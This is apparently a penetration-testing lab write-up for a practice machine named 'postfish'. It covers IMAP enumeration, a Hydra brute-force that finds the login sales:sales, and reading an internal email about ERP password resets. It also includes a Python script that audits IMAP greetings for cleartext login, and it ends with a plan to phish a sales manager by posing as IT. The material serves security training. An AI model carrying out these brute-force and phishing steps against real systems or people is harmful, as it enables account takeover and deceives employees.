IMAP
Nmap discovered an IMAP service on the target on ports 143 and 993. The running service is Dovecot imapd (Ubuntu).
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/postfish]
└─$ telnet $IP 143
Trying 192.168.111.137...
Connected to 192.168.111.137.
Escape character is '^]'.
* OK [CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE LITERAL+ STARTTLS AUTH=PLAIN] Dovecot (Ubuntu) ready.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/postfish]
└─$ openssl s_client -connect $IP:993 -crlf -quiet
Connecting to 192.168.111.137
Can't use SSL_get_servername
depth=0 CN=ubuntu
verify error:num=18:self-signed certificate
verify return:1
depth=0 CN=ubuntu
verify return:1
* OK [CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE LITERAL+ AUTH=PLAIN] Dovecot (Ubuntu) ready.
Connected, but a valid credential is required to proceed any further.
Brute-Force Attack
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/postfish]
└─$ hydra -L valid_users.txt -P ./valid_users.txt imap://$IP/ -t 64
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-26 14:02:33
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 64 tasks per 1 server, overall 64 tasks, 81 login tries (l:9/p:9), ~2 tries per task
[DATA] attacking imap://192.168.111.137:143/
[143][imap] host: 192.168.111.137 login: sales password: sales
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-03-26 14:02:46
Using the valid_users.txt file from the SMTP enumeration earlier, Hydra found a valid credential: sales:sales.
Session
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/postfish]
└─$ telnet $IP 143
Trying 192.168.111.137...
Connected to 192.168.111.137.
Escape character is '^]'.
* OK [CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE LITERAL+ STARTTLS AUTH=PLAIN] Dovecot (Ubuntu) ready.
A1 LOGIN sales sales
A1 OK [CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE SORT SORT=DISPLAY THREAD=REFERENCES THREAD=REFS THREAD=ORDEREDSUBJECT MULTIAPPEND URL-PARTIAL CATENATE UNSELECT CHILDREN NAMESPACE UIDPLUS LIST-EXTENDED I18NLEVEL=1 CONDSTORE QRESYNC ESEARCH ESORT SEARCHRES WITHIN CONTEXT=SEARCH LIST-STATUS BINARY MOVE SNIPPET=FUZZY PREVIEW=FUZZY LITERAL+ NOTIFY SPECIAL-USE] Logged in
Authenticated
A1 LIST "" *
* LIST (\HasNoChildren) "/" INBOX
A1 OK List completed (0.053 + 0.000 + 0.052 secs).
A1 LIST INBOX *
* LIST (\HasNoChildren) "/" INBOX
A1 OK List completed (0.001 + 0.000 secs).
A1 LIST "Archive" *
A1 OK List completed (0.001 + 0.000 secs).
A1 LSUB "" *
A1 OK Lsub completed (0.001 + 0.000 secs).
A1 STATUS INBOX (MESSAGES UNSEEN RECENT)
* STATUS INBOX (MESSAGES 1 RECENT 1 UNSEEN 1)
A1 OK Status completed (0.001 + 0.000 secs).
There is a single, unseen email in INBOX.
A1 SELECT INBOX
* FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
* OK [PERMANENTFLAGS (\Answered \Flagged \Deleted \Seen \Draft \*)] Flags permitted.
* 1 EXISTS
* 1 RECENT
* OK [UNSEEN 1] First unseen.
* OK [UIDVALIDITY 1742994297] UIDs valid
* OK [UIDNEXT 2] Predicted next UID
A1 OK [READ-WRITE] Select completed (0.001 + 0.000 secs).
Selecting INBOX and fetching the single message
A1 FETCH 1 body[]
* 1 FETCH (BODY[] {683}
Return-Path: <it@postfish.off>
X-Original-To: sales@postfish.off
Delivered-To: sales@postfish.off
Received: by postfish.off (Postfix, from userid 997)
id B277B45445; Wed, 31 Mar 2021 13:14:34 +0000 (UTC)
Received: from x (localhost [127.0.0.1])
by postfish.off (Postfix) with SMTP id 7712145434
for <sales@postfish.off>; Wed, 31 Mar 2021 13:11:23 +0000 (UTC)
Subject: ERP Registration Reminder
Message-Id: <20210331131139.7712145434@postfish.off>
Date: Wed, 31 Mar 2021 13:11:23 +0000 (UTC)
From: it@postfish.off

Hi Sales team,
We will be sending out password reset links in the upcoming week so that we can get you registered on the ERP system.
Regards,
IT
)
A1 OK Fetch completed (0.001 + 0.000 secs).
The mail is from the it user to the sales user, stating that the IT team will be sending out password reset links to register them on the ERP system. This means a password reset link from the it user is expected.
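One detail worth recording from the session above: the greeting on port 143 advertises STARTTLS together with AUTH=PLAIN and no LOGINDISABLED, so the A1 LOGIN issued over telnet crossed the wire unencrypted. The following Python script is an added example, not part of the original write-up; it checks a captured greeting for that condition and parses the untagged STATUS response from the session. The greetings for 143 and 993 are the ones captured above; the hardened greeting is an assumed reconstruction of what Dovecot advertises on a non-TLS port when disable_plaintext_auth = yes is set.

```python
"""Audit IMAP greetings for cleartext-auth exposure; parse a STATUS response."""
import re

# Constructed inputs: the greetings Dovecot sent on 143 and 993 above, plus an
# assumed reconstruction of the non-TLS greeting Dovecot sends when
# disable_plaintext_auth = yes is set (not captured on this box).
GREETING_143 = ("* OK [CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE "
                "LITERAL+ STARTTLS AUTH=PLAIN] Dovecot (Ubuntu) ready.")
GREETING_993 = ("* OK [CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE "
                "LITERAL+ AUTH=PLAIN] Dovecot (Ubuntu) ready.")
GREETING_HARDENED = ("* OK [CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE "
                     "IDLE LITERAL+ STARTTLS LOGINDISABLED] Dovecot (Ubuntu) ready.")
STATUS_LINE = "* STATUS INBOX (MESSAGES 1 RECENT 1 UNSEEN 1)"


def parse_capabilities(greeting):
    """Return the set of tokens inside the [CAPABILITY ...] response code."""
    m = re.search(r"\[CAPABILITY ([^\]]+)\]", greeting)
    if m is None:
        raise ValueError("greeting carries no CAPABILITY response code")
    return set(m.group(1).split())


def cleartext_auth_allowed(greeting, implicit_tls):
    """True if a client may authenticate before TLS has been negotiated.

    RFC 3501 section 6.2.3: a server advertising LOGINDISABLED refuses LOGIN
    until STARTTLS completes (Dovecot then also drops AUTH=PLAIN). Port 143
    above offers STARTTLS but not LOGINDISABLED, so the 'A1 LOGIN sales sales'
    in the session went over the wire unencrypted.
    """
    if implicit_tls:  # port 993: the whole session is already inside TLS
        return False
    return "LOGINDISABLED" not in parse_capabilities(greeting)


def parse_status(line):
    """Parse '* STATUS <mailbox> (NAME n ...)' into {NAME: n}."""
    m = re.fullmatch(r"\* STATUS \S+ \((.*)\)", line.strip())
    if m is None:
        raise ValueError("not an untagged STATUS response")
    items = m.group(1).split()
    return {k: int(v) for k, v in zip(items[::2], items[1::2])}
```

On a Dovecot host the fix for the 143 finding is disable_plaintext_auth = yes (the default), which makes the plain port advertise LOGINDISABLED until STARTTLS has completed.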
Given that the brian.moore user is a Sales Manager, it might be possible to send a phishing email to the brian.moore user with a "password reset link", posing as the it user.